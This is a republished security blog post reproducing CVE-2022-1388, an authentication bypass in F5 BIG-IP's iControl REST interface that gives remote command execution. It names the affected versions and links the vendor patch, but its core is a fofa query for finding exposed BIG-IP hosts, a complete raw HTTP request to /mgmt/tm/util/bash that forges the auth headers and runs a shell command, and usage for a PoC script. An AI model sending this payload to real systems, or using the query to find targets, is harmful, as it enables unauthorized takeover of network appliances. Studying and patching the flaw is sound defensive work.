F5 BIG-IP has a remote command execution vulnerability (CVE-2022-1388)

Enterprise 2023-08-26 00:29:23 views: null

Article directory

F5 BIG-IP has a remote command execution vulnerability (CVE-2022-1388)

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to F5 BIG-IP

WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account

F5 BIG-IP is an application delivery platform integrated with network traffic management, application security management, load balancing and other functions of F5 Corporation of the United States.

2. Vulnerability description

F5 BIG-IP is an application delivery platform integrated with network traffic management, application security management, load balancing and other functions of F5 Corporation of the United States. An access control error vulnerability exists in F5 BIG-IP that could be exploited by an attacker via an undisclosed request to bypass iControl REST authentication in BIG-IP to gain control of an affected system. Can lead to remote command execution vulnerabilities

CVE ID: CVE-2022-1388
CNNVD ID: CNNVD-202205-2141
CNVD ID:

3. Affect the version

  • BIG-IP versions 16.1.0 to 16.1.2 (Patch released)
  • BIG-IP versions 15.1.0 to 15.1.5 (Patch released)
  • BIG-IP versions 14.1.0 to 14.1.4 (Patch released)
  • BIG-IP versions 13.1.0 to 13.1.4 (Patch released)
  • BIG-IP versions 12.1.0 to 12.1.6 (End of Support)
  • BIG-IP versions 11.6.1 to 11.6.5 (End of Support)
    F5 BIG-IP has a remote command execution vulnerability (CVE-2022-1388)

4. fofa query statement

title=“BIG-IP®- Redirect”

5. Vulnerability recurrence

Vulnerability link: http://127.0.0.1/mgmt/tm/util/bash
vulnerability data package:

POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

{"command": "run" , "utilCmdArgs": "-c id" }

F5 BIG-IP has a remote command execution vulnerability (CVE-2022-1388)

6.POC&EXP

Follow the official account Nanfeng Vulnerability Recurrence Library and reply to Vulnerability Recurrence 30 to get the POC tool download address:
Usage:
python3 CVE-2022-1388.py -u http://127.0.0.1:8080

F5 BIG-IP has a remote command execution vulnerability (CVE-2022-1388)

7. Rectification opinions

At present, the manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is: https://support.f5.com/csp/article/K23605346

8. Past review

Guess you like

Origin blog.csdn.net/nnn2188185/article/details/130537344
Recommended
Ranking
A quick primer on numpy basics
Two sister tease python project
Java | Multiple keywords in the replacement content are returned to the front end in red style
C ++: references
The string leetcood 1018 is a binary prefix divisible by 5
Flutter 布局组件
Java combat spingboot-redis
PMP pre-exam sprint and wrong questions sorting
ActiveMq C# Message Features: Delayed and Timed Message Delivery
DSP28377S_ copy a program from the RAM to FLASH portion DETAILS
Daily
More
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)

Code World

© 2018 codetd.com